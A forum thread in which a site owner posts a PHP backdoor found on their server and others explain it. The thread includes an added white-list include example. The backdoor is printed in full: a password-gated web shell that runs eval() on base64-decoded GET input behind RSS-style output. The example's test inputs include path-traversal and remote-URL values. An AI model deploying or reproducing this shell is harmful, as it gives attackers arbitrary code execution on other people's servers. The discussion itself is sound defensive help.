sastro Posted January 1, 2010

I found a PHP file in my web yesterday. Here is the content:

<?php
error_reporting(0);
if (!isset($_GET['a'])) {
    die("inQontrol");
}
$pass = "4f7c192d4ea7b0758f191865577f36f2";
echo "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>";
echo "<rss version=\"2.0\">";
echo "<channel><title>inQontrol</title><link>http://google.com/</link><description>inQontrol</description><language>en</language><copyright>inQontrol</copyright>\n\n";
echo "<output>";
function writerss($name,$text) {
    echo "<".base64_encode($name).">".base64_encode($text)."</".base64_encode($name).">\n";
}
$a = $_GET['a'];
$a = md5(base64_decode($a));
if ($a != $pass) {
    writerss("status","wrongpass");
} else {
    writerss("status","ok");
    $b = $_GET['b'];
    $b = base64_decode($b);
    eval($b);
}
echo "\n\n</output></channel></rss>";
?>

What is this file?

premiso Posted January 1, 2010

It's dangerous code whatever it is. Will allow someone who put it there to pretty much execute any code they want on your server with that eval.

Mchl Posted January 1, 2010

Congratulations, your site has been compromised and infected with some kind of malicious script. It uses eval to let a person who knows the password do just about anything on your account.

sastro (Author) Posted January 1, 2010

How did they put this file there? I've been using strip_tags to sanitize the input form. Is it not enough?

premiso Posted January 1, 2010

Chances are one of the scripts in your site includes a file from GET data. And you do not check if that file exists on your server and you do not limit it to a white list of pages. This is dangerous in many ways as if allow_fopen_wrappers is on then yea, it can execute a remote script and open your site up to security breaches like so.

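The white-list check premiso describes, as an added example that is not part of the original thread. The function name resolve_page(), the page names and the temporary demo directory are hypothetical; the inputs in the loop are constructed samples, and in a real script the value would come from a request parameter.

```php
<?php
// Added example, not code from the thread. All names here are hypothetical.
//
// Pattern the post warns about (request data goes straight into include):
//     include $_GET['page'] . '.php';

/**
 * Map a request value to a file path, or return null if it is not allowed.
 * $allowed maps accepted request values to file names under $baseDir.
 */
function resolve_page($requested, array $allowed, string $baseDir): ?string
{
    // Arrays (?page[]=x) and anything not on the white list are rejected.
    if (!is_string($requested) || !array_key_exists($requested, $allowed)) {
        return null;
    }
    // The path is built from the white-list value, never from the request.
    $path = realpath($baseDir . '/' . $allowed[$requested]);
    $base = realpath($baseDir);
    // realpath() returns false when the file does not exist on the server.
    if ($path === false || $base === false) {
        return null;
    }
    // Confirm the resolved file really sits inside the pages directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Demo with a throwaway pages directory so the script runs offline.
$dir = sys_get_temp_dir() . '/pages_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/home.php', "<?php echo 'home';");
$allowed = ['home' => 'home.php', 'about' => 'about.php']; // about.php is missing

// Constructed sample inputs standing in for $_GET['page'].
$samples = ['home', 'about', '../../etc/passwd', 'http://example.invalid/x', ['home']];
foreach ($samples as $input) {
    $path = resolve_page($input, $allowed, $dir);
    $verdict = $path === null ? 'rejected, send 404' : 'include ' . basename($path);
    printf("%-30s => %s\n", json_encode($input, JSON_UNESCAPED_SLASHES), $verdict);
}

unlink($dir . '/home.php');
rmdir($dir);
```

Only the first sample resolves to a file; the listed-but-missing page, the path and URL values, and the array are all rejected before any include would run.
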
Mchl Posted January 1, 2010

"Is it not enough?"

Hardly... http://www.phpfreaks.com/tutorial/php-security

Irresistable Posted January 1, 2010

Can anyone give me any information on this? I haven't experienced this happening before. Though I'd like to know more about it, how they do it, what it can do and how to prevent. With the main one, what is this called?

Mchl Posted January 1, 2010

See the article to which I linked above. There are many methods this could be achieved. One option not mentioned there, but apparently quite common recently, is a malware stealing your ftp password (stored in your ftp client).

Irresistable Posted January 1, 2010

Do you know any methods to tackle that? Being as it's not mentioned in the article.